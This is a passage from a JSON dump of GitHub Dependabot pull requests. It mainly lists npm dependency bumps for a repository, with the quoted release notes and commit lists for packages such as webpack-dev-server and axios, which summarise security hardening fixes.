attacker-controlled keys inherited from a poisoned prototype cannot propagate through deserialization. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7413\"\u003e#7413\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eProxy Cleartext Leak:\u003c/strong\u003e Fixed an issue where HTTPS request data could be transmitted in cleartext to an HTTP proxy under certain configurations. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10858\"\u003e#10858\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCI Cache Removal:\u003c/strong\u003e Removed all GitHub Actions caches as a defence-in-depth measure against cache poisoning vectors in the build pipeline. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10882\"\u003e#10882\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eData URI Parsing:\u003c/strong\u003e Updated the \u003ccode\u003efromDataURI\u003c/code\u003e regex to match RFC 2397 more strictly, fixing edge cases in \u003ccode\u003edata:\u003c/code\u003e URL handling. (\u003cstrong\u003e\u003ca h...\n\n_Description has been truncated_","html_url":"https://github.com/navikt/k9-los-web/pull/4268","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/navikt%2Fk9-los-web/issues/4268","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/4268/packages"},{"uuid":"4551583254","node_id":"PR_kwDOKRyrU87gze5v","number":31,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 2 directories with 9 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-05-30T23:52:11.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-29T20:57:17.000Z","updated_at":"2026-05-30T23:52:13.000Z","time_to_close":96894,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":9,"packages":[{"name":"webpack-dev-server","old_version":"5.2.1","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"axios","old_version":"0.30.2","new_version":"0.32.0","repository_url":"https://github.com/axios/axios"},{"name":"@babel/plugin-transform-modules-systemjs","old_version":"7.16.5","new_version":"7.29.7","repository_url":"https://github.com/babel/babel"},{"name":"fast-uri","old_version":"3.1.0","new_version":"3.1.2","repository_url":"https://github.com/fastify/fast-uri"},{"name":"follow-redirects","old_version":"1.15.11","new_version":"1.16.0","repository_url":"https://github.com/follow-redirects/follow-redirects"},{"name":"handlebars","old_version":"4.7.7","new_version":"4.7.9","repository_url":"https://github.com/handlebars-lang/handlebars.js"},{"name":"immutable","old_version":"4.0.0","new_version":"4.1.0","repository_url":"https://github.com/immutable-js/immutable-js"},{"name":"protobufjs","old_version":"7.5.4","new_version":"7.6.1","repository_url":"https://github.com/protobufjs/protobuf.js"},{"name":"socket.io-parser","old_version":"4.2.4","new_version":"4.2.6","repository_url":"https://github.com/socketio/socket.io"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 9 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `5.2.1` | `5.2.4` |\n| [axios](https://github.com/axios/axios) | `0.30.2` | `0.32.0` |\n| [@babel/plugin-transform-modules-systemjs](https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs) | `7.16.5` | `7.29.7` |\n| [fast-uri](https://github.com/fastify/fast-uri) | `3.1.0` | `3.1.2` |\n| [follow-redirects](https://github.com/follow-redirects/follow-redirects) | `1.15.11` | `1.16.0` |\n| [handlebars](https://github.com/handlebars-lang/handlebars.js) | `4.7.7` | `4.7.9` |\n| [immutable](https://github.com/immutable-js/immutable-js) | `4.0.0` | `4.1.0` |\n| [protobufjs](https://github.com/protobufjs/protobuf.js) | `7.5.4` | `7.6.1` |\n| [socket.io-parser](https://github.com/socketio/socket.io) | `4.2.4` | `4.2.6` |\n\nBumps the npm_and_yarn group with 1 update in the /packages/web directory: [axios](https://github.com/axios/axios).\n\nUpdates `webpack-dev-server` from 5.2.1 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.2\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `axios` from 0.30.2 to 0.32.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/releases\"\u003eaxios's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.32.0 — May 4, 2026\u003c/h2\u003e\n\u003cp\u003eThis release backports a comprehensive set of security and hardening fixes from the v1.x branch into v0.x, covering prototype-pollution protections, default error redaction, stricter proxy/cookie/socket handling, and one breaking change to merged config and header object prototypes.\u003c/p\u003e\n\u003ch2\u003e⚠️ Breaking Changes \u0026amp; Deprecations\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eNull-prototype merged objects: mergeConfig and header merging now return objects with a null prototype to block prototype-pollution gadgets. Consumers must use Object.prototype.hasOwnProperty.call(obj, key) and avoid implicit string coercion against merged config or header objects. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDefault error redaction: AxiosError.toJSON() now redacts sensitive keys by default to prevent credential leaks in logs. The behavior is configurable via config.redact, with defaults exposed on defaults.redact. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCookie \u0026amp; XSRF handling: Cookie names are read literally rather than via regex, and only own properties are respected when evaluating withXSRFToken. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eProxy bypass IPv6 parity: NO_PROXY matching now handles canonical IPv4-mapped IPv6 forms such as ::ffff:127.0.0.1 and ::ffff:7f00:1. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNode http adapter hardening: Strips Proxy-Authorization when no proxy is in use and gates socketPath behind a new allowedSocketPaths allowlist (string or array, normalized) to reduce accidental Unix socket exposure. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBrowser xhr adapter: Stricter own-property checks when reading config and headers. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eURL parameters: AxiosURLSearchParams keeps %00 encoded and applies consistent encoding throughout. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePublic type surface: Adds formDataHeaderPolicy, redact, and allowedSocketPaths to the TypeScript declarations alongside their runtime defaults. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRepo hygiene: Updates README.md and CHANGELOG.md, adds AGENTS.md, and refreshes the issue and PR templates. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/axios/axios/compare/v0.31.1...v0.32.0\"\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.31.1\u003c/h2\u003e\n\u003cp\u003eThis release backports a broad set of security hardenings from the v1 line — covering prototype-pollution defences, stream size enforcement, XSRF handling, URL null-byte encoding, and bounded FormData recursion — and drops committed \u003ccode\u003edist/\u003c/code\u003e artefacts along with Bower support.\u003c/p\u003e\n\u003ch2\u003e⚠️ Breaking Changes \u0026amp; Deprecations\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBower \u0026amp; Committed \u003ccode\u003edist/\u003c/code\u003e Removed:\u003c/strong\u003e \u003ccode\u003edist/\u003c/code\u003e bundles are no longer committed to the repo, and \u003ccode\u003ebower.json\u003c/code\u003e plus the Grunt \u003ccode\u003epackage2bower\u003c/code\u003e task have been removed. CI still builds bundles before publish, so npm/yarn/pnpm consumers are unaffected; installs via Bower or directly from the git tree must migrate to npm or a CDN. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10747\"\u003e#10747\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution in Header Merge (GHSA-6chq-wfr3-2hj9):\u003c/strong\u003e Tightened \u003ccode\u003eisFormData\u003c/code\u003e to reject plain/null-prototype objects and require \u003ccode\u003eappend\u003c/code\u003e, and guarded the Node HTTP adapter so \u003ccode\u003edata.getHeaders()\u003c/code\u003e is only merged when it is not inherited from \u003ccode\u003eObject.prototype\u003c/code\u003e. Blocks injected headers via polluted \u003ccode\u003egetHeaders\u003c/code\u003e. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10750\"\u003e#10750\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution in Config Merging (GHSA-pf86-5x62-jrwf):\u003c/strong\u003e \u003ccode\u003emergeConfig\u003c/code\u003e, defaults resolution, and the HTTP adapter now uses own-property checks for \u003ccode\u003etransport\u003c/code\u003e, \u003ccode\u003eenv\u003c/code\u003e, \u003ccode\u003eBlob\u003c/code\u003e, \u003ccode\u003eformSerializer\u003c/code\u003e, and transforms arrays, and merged configs are returned as null-prototype objects. Prevents hijacking of the request flow through polluted prototypes. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10752\"\u003e#10752\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFormData / Params Recursion DoS:\u003c/strong\u003e Added a configurable \u003ccode\u003emaxDepth\u003c/code\u003e (default \u003ccode\u003e100\u003c/code\u003e, \u003ccode\u003eInfinity\u003c/code\u003e disables) to \u003ccode\u003etoFormData\u003c/code\u003e and params serialisation, throwing \u003ccode\u003eAxiosError\u003c/code\u003e with code \u003ccode\u003eERR_FORM_DATA_DEPTH_EXCEEDED\u003c/code\u003e when exceeded. Circular-reference detection is preserved. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10728\"\u003e#10728\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eNull-Byte Injection in Query Strings:\u003c/strong\u003e Removed the unsafe \u003ccode\u003e%00\u003c/code\u003e → null-byte substitution from \u003ccode\u003eAxiosURLSearchParams.encode\u003c/code\u003e so \u003ccode\u003e%00\u003c/code\u003e is preserved as-is. Other encoding behaviour (including \u003ccode\u003e%20\u003c/code\u003e → \u003ccode\u003e+\u003c/code\u003e) unchanged. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10737\"\u003e#10737\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eConsolidated v1 Security Backport:\u003c/strong\u003e Rolls up remaining v1 hardenings into \u003ccode\u003ev0.x\u003c/code\u003e: \u003ccode\u003emaxContentLength\u003c/code\u003e enforcement for \u003ccode\u003eresponseType: 'stream'\u003c/code\u003e via a guarded transform with deferred piping, \u003ccode\u003emaxBodyLength\u003c/code\u003e enforcement for streamed uploads on native \u003ccode\u003ehttp\u003c/code\u003e/\u003ccode\u003ehttps\u003c/code\u003e with \u003ccode\u003emaxRedirects: 0\u003c/code\u003e, and stricter \u003ccode\u003ewithXSRFToken\u003c/code\u003e handling so only own boolean \u003ccode\u003etrue\u003c/code\u003e enables cross-origin XSRF headers. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10764\"\u003e#10764\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eCODEOWNERS:\u003c/strong\u003e Added \u003ccode\u003e.github/CODEOWNERS\u003c/code\u003e with \u003ccode\u003e* @jasonsaayman\u003c/code\u003e to set a default reviewer for all paths. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10740\"\u003e#10740\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/axios/axios/compare/v0.31.0...v0.31.1\"\u003eFull Changelog\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.31.0\u003c/h2\u003e\n\u003cp\u003eThis release backports security fixes from v1.x, hardens the CI/CD supply chain with OIDC publishing and \u003ccode\u003ezizmor\u003c/code\u003e scanning, resolves TypeScript typing issues in \u003ccode\u003eAxiosInstance\u003c/code\u003e, and fixes a performance regression in \u003ccode\u003eisEmptyObject()\u003c/code\u003e.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/8db2d44896849a21ed9721185b1034df24e1ba7b\"\u003e\u003ccode\u003e8db2d44\u003c/code\u003e\u003c/a\u003e chore: bump version to v0.32.0 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10840\"\u003e#10840\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/2af6116a957b1dd1b32056181326da8a5540d3bc\"\u003e\u003ccode\u003e2af6116\u003c/code\u003e\u003c/a\u003e chore: backport fixes from the v1x branch (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/a589dc525af12e0fabef7d6e5be028ad433eee31\"\u003e\u003ccode\u003ea589dc5\u003c/code\u003e\u003c/a\u003e chore: bump version to v0.31.1 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10766\"\u003e#10766\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/b0c632f36a5ea2e73c9bdf3a54164a8ede925736\"\u003e\u003ccode\u003eb0c632f\u003c/code\u003e\u003c/a\u003e fix: backport security issues (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10764\"\u003e#10764\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/b52187f4571b6b8663fed5904e3082ab30660364\"\u003e\u003ccode\u003eb52187f\u003c/code\u003e\u003c/a\u003e fix: harden config merging (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10752\"\u003e#10752\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/e3ddeb40f6a142a234925341151e2ca631a6de64\"\u003e\u003ccode\u003ee3ddeb4\u003c/code\u003e\u003c/a\u003e fix: header security issues (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10750\"\u003e#10750\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/f4f2d76e25cc0f777e5416e2d76282ab873ef9dc\"\u003e\u003ccode\u003ef4f2d76\u003c/code\u003e\u003c/a\u003e chore: stop committing dist/ and remove bower (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10747\"\u003e#10747\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/1f2f64433e5be205d74471c78c2721909282b9c0\"\u003e\u003ccode\u003e1f2f644\u003c/code\u003e\u003c/a\u003e chore: add CODEOWNERS (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10740\"\u003e#10740\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/44bca902e1bdd7dd6490c7b4985b63e729b0e634\"\u003e\u003ccode\u003e44bca90\u003c/code\u003e\u003c/a\u003e fix: improve regex in AxiosURLSearchParams (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10737\"\u003e#10737\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/4c4f07fabdb005f5430bab797f12b55e2ed5fb33\"\u003e\u003ccode\u003e4c4f07f\u003c/code\u003e\u003c/a\u003e fix: form data recursion (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10728\"\u003e#10728\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca 